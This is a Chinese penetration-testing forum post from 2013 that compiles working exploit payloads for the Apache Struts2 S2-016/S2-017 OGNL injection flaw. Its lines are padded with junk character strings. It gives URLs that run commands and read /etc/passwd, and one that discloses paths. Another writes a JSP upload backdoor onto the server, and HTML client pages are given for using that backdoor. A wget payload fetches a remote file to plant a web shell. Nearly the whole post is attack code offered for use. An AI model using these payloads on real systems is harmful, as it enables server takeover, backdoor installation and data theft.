中国网络渗透测试联盟

标题: Struts2 S2-016/S2-017漏洞执行代码 [打印本页]
作者: admin    时间: 2013-7-18 23:03
标题: Struts2 S2-016/S2-017漏洞执行代码
大家都发了,,我就整理了一下。友情提示,自己小命比shell重要哦。。3 C& U, n& V3 W- l4 W7 S1 _, a
7 q" q3 [* X* \; _* H
喜欢就点一下感谢吧^_^
; V- W- N* Z" J" `1 ?& E  F2 d+ P; k* N5 \
带回显命令执行:2 F3 w* [- d, C: ^
; w. Q! K8 E1 N. @
http://www.example.com/struts2-blank/example/X.action?redirect:${%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{'cat','/etc/passwd'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b),%23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}
. Z' y. G0 y0 R# ?
! k) `5 b1 T! _+ N# N/ E+ p4 z* a  M
$ c# |4 A# u2 p
8 _! m1 H) G" y" T( H& x7 H3 w
$ P+ i) O; E4 W3 w  s
4 q' @7 {; X1 b: O) }! Y* k- X

# Q1 Y# M# y; L2 o% x+ s' U爆路径:) X$ Z4 p- a: d' l* {7 A

3 \: q& T/ ?; v9 Lhttp://www.example.com/struts2-b ... 8%29.close%28%29%7D# w. Z. J! z- s6 Q$ x2 V' k

2 o  a* r3 J/ {& A2 o" L$ ?* j; z+ w( O9 v( y. `8 I
* x1 f! Z" R7 G3 U, D# e
' y+ x$ C: e# s, l; V
4 a7 }  o9 i# e# ^, K
写文件:1 J" I2 D- g- s1 p

5 X5 Y, O: `7 Bhttp://www.example.com/struts2-blank/example/X.action?redirect:${
9 e. }5 o( J$ J2 ]+ q% [9 A
+ ?9 c7 i! r$ `%23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),
- ~" ]. q4 |* Q3 E7 X
1 S' X* p2 e4 ~. S2 t$ y%23p%3d(%23req.getRealPath(%22/%22)%2b%22css3.jsp%22).replaceAll("\\\\", "/"),/ l* U* P& X) S9 i* X8 v5 N* l2 w$ Q* O

" w; x* q+ E3 ^# \7 Mnew+java.io.BufferedWriter(new+java.io.FileWriter(%23p)).append(%23req.getParameter(%22c%22)).close()5 ?2 V+ Y7 y( x2 J4 s- O( ?
7 |7 l' b: f8 x8 f3 t
}&c=%3c%25if(request.getParameter(%22f%22)!%3dnull)(new+java.io.FileOutputStream(application.getRealPath(%22%2f%22)%2brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3b%25%3e
7 N2 F: l8 W$ @8 F. w
6 s/ R# @6 C7 k
$ ~7 V$ }2 ~" E- g5 I
/ T" L$ Y* A; @$ p) A! x& m写入的文件内容:) `5 E+ r  l/ S  W5 e7 ?4 ?( D

4 f  {, p$ y; @$ `( r<%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("/")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%>      
, l4 A4 O% T7 Q: o6 A. j; q. O% L# A  _5 T) Q4 d% o
其实就是一个jsp的小马,需要客户端配合                                                                                  $ B, v& ]/ L6 @0 o6 u; D

1 q8 V& J8 v( K函数f是文件名,t是内容
+ V2 X: r! S  m' }
0 n! Y* L% h! `% ~( K客户端:
8 Y3 l1 d4 s- ]$ U( g/ p5 Y. k" }# s" S6 O9 c+ S
<form action="http://www.example.com/struts2-blank/example/css3.jsp?f=fjp.jsp" method="post">3 f( c: I0 Y- L2 D* B+ W

$ b, U' G" R2 b+ T5 h: C# X! o& ^- T<textarea name=t cols=120 rows=10 width=45>your code</textarea>
. r/ \  M9 ^* Z( \2 ^3 C- `
7 u$ r2 `( y2 A# l# S, Y2 N<center>  r' m" c/ s& S) S+ C: i. w

- n! p& U3 R( g9 J+ a% d& T0 k7 S4 @% ^& f
, a8 d; }9 d- S. [6 Y) @
<input type=submit value="提交">
3 z  \$ p9 r/ h" i
6 h6 s! i2 R4 p7 l</form>
: g1 Q' f0 o% `" q! e$ E' T7 x' \4 `. p9 {: j
就在当前目录建立一个fjp.jsp( i' d; A. R6 I4 j, z

! y7 g5 N; [) L" q. |' J5 ushell:http://www.example.com/struts2-blank/example/fjp.jsp
" ^% l* T' K/ {9 k9 g& ]/ G7 }4 B; `- w
3 x3 C0 x1 g5 S$ Q: X5 T

6 F# D8 S4 o9 Q4 B8 K还有@园长的一个客户端:( l/ s, Q0 \+ W2 K. z2 `- U

; n& J# Y! n+ }3 H1 c; e1 j8 t<html>7 g, L8 b3 E* y

; b; ~: Y( Z/ p4 M* `6 J<head>' ^0 [$ {8 ]4 j% Y
1 ]5 D, g& z: ~! C) y. C
<meta http-equiv="content-type" content="text/html;charset=utf-8">  N8 d6 [) }. Z9 {7 g: \+ a1 `
6 V1 V3 j1 G- L% B( L; l
<title>jsp-园长</title>7 m8 I0 [* u7 b
. C( @/ ?: E- K( U
</head>
* b8 Q8 B- n- Q
  |3 z: Q7 m  t4 U; U' D<style>. S$ M7 |1 z, N+ @
  y9 q# D1 J+ V! E; I" F
.main{width:980px;height:600px;margin:0 auto;}
8 [9 ~( S. D' h$ x" l6 q$ n, n* b% [# L+ T- W
.url{width:300px;}9 \4 o) S- A8 j' E
8 s" R9 J+ }+ v. _" d
.fn{width:60px;}/ [& V, o7 f8 k- v

# G4 o9 }7 z! f: h2 a7 I.content{width:80%;height:60%;}8 @8 D  |: W8 z; H) V8 u
1 g$ N/ A. G/ _, U/ l
</style>, W% a, L2 f+ d: `. B2 h
7 x) ~. H9 A) w) P9 `! O3 ]; e
<script>
+ U  c! x2 \4 S1 y- e- q0 p
' I+ @1 Y7 }+ Y$ L- `  function upload(){% g$ w3 r0 [. {; ^4 {6 I$ j$ m

& }2 ?2 L: w( Z6 W6 h2 Y5 A' X4 r    var url = document.getElementById('url').value,
/ u+ Q  R( x' Q3 |( L, p/ s4 F0 F! d  g  r$ E/ f0 V# c
      content = document.getElementById('content').value,4 r2 `$ e+ i. M/ l
5 B, X, v- Q( B& [) x6 ^% h: h
      fileName = document.getElementById('fn').value,
9 ?; c3 Z. g4 u' ]( {, }% @' ?6 q# G% o% i# @: n1 F2 H
      form = document.getElementById('fm');
; t5 k0 P& c2 U: f# c+ x
0 |& G# N+ B% _+ y    if(url.length == 0){
0 B, O6 ?8 Z/ T4 l2 l
4 r/ L+ k- r8 P$ u9 V& B; _  r      alert("Url not allowd empty!");
" Z+ V3 P' @/ Y. u, `1 O0 N/ n( G. A. g% R& `( `
      return ;
" h- D( w* f$ U. s4 [9 ]; Y3 }$ K+ {8 y" A1 h, g$ G
    }
0 M3 N  @! F, b4 {; o" Z
/ B6 q& R3 ]8 k$ P    if(content.length == 0){
, W* v1 h  F6 ~+ T: P) E5 D6 y- [& Z3 Z6 W3 m2 L, H. u- L/ t
      alert("Content not allowd empty!");9 M/ x4 @: ^3 v4 U& X2 k
$ q% @5 c" `' i/ E" P5 c0 S& z/ r
      return ;/ ~- z! o7 S* e

5 I5 {+ }/ _( v! K/ d    }0 z$ |/ ?+ O4 h" R' }9 `9 ?

5 i, t" T- u2 `    if(fileName.length == 0){/ I! |4 f' M( F

! W  e) q9 w/ t6 p      alert("FileName not allowd empty!");
2 X. h4 k& S. z; e/ n) N( G( i3 P4 n' q
      return ;, e& p8 e1 C! p: }8 p0 a& I) m

0 K/ V7 L5 I4 P8 X    }
" p6 |: {6 E) Y0 Z. m5 F' e9 d
' S$ H+ U7 ^. E' L3 v    form.action = url;' }! `! q# b- Q$ Y+ e" c, `

1 G! q8 |+ X" t0 ?' h- B. G8 u    form.submit();
% H# j$ W0 r8 x; A; E" s
0 c2 A6 M/ F: j, @. N  Y  }
' Q! e; P. C& J: m3 P8 l4 m; y
# E* @' H' u% y. H2 f' v. j- n$ i</script>/ G) c6 \5 \& v+ g7 `

9 [- g( D+ K( f9 |<body>
8 |7 f+ ^0 `& B" T9 T! T5 f# {+ n# u+ Y' \; @+ B
<div class="main">: Y2 w4 G, F. c; e5 d( q

. N4 D9 `, H5 ?- O  <form id="fm" method="post">  
' c3 h- a. l: e2 X+ Q
. F& G: S) ~" C$ e    URL:<input type="text" value="http://localhost/Struts2/css3.jsp" class="url" id="url"/>  + S3 j' i& ]8 [+ ]

5 c  M' f* P& q7 a3 R( X: D/ _    FileName:<input type="text" name="f" value="css.jsp" class="fn" id="fn" />  
0 o0 \, F/ Q3 P) Y9 O0 |+ ^, T) L0 ~- Y& a" a
    <a href="javascript:upload();">Upload</a># J; d* M. F! }/ K* {( i
6 s: W+ d6 C( R7 J/ `

6 n" x- w# y! j4 V8 }+ `
, {$ c0 r$ p0 X. G2 b2 ~    <textarea id="content" class="content" name="t" ></textarea>
1 ?( J! @! Q- c1 ?
/ o2 J% s  M# s' j8 d' r1 y  </form>+ O8 l1 `& G1 T/ h

; v: c4 o8 n% j</div>
) Q" K+ y# [" Q5 [2 @
2 }  c9 [. X8 ?</body>
$ P4 M+ U8 d% b7 j/ ^4 `( ^0 l( E
+ X  f) E% g5 F2 K</html>
& W% |; ^. u- R9 \: v
4 q2 P# [& e, n
- A, B' z7 P; p& \5 p  F
& e/ X1 L2 l. L5 ?" b6 T还有@X发的一个wget的getshell& I9 `; J. T- ~7 ~) q/ z# r9 V

" K. X0 B% G0 H0 }( o?redirect{%23a%3d(new  java.lang.ProcessBuilder(new java.lang.String[]{'wget','http://www.url.com/xx.txt','- O','/root/1.jsp'}
5 G1 _: `# A" ^% Y, l
) V4 y4 b$ h# U' J)).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b), %23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e), %23piaoye%3d%23context.get ('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23piaoye.getWriter().println (%23e),%23piaoye.getWriter().flush(),%23piaoye.getWriter().close()}  c/ u* n3 R1 c/ z
复制代码



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2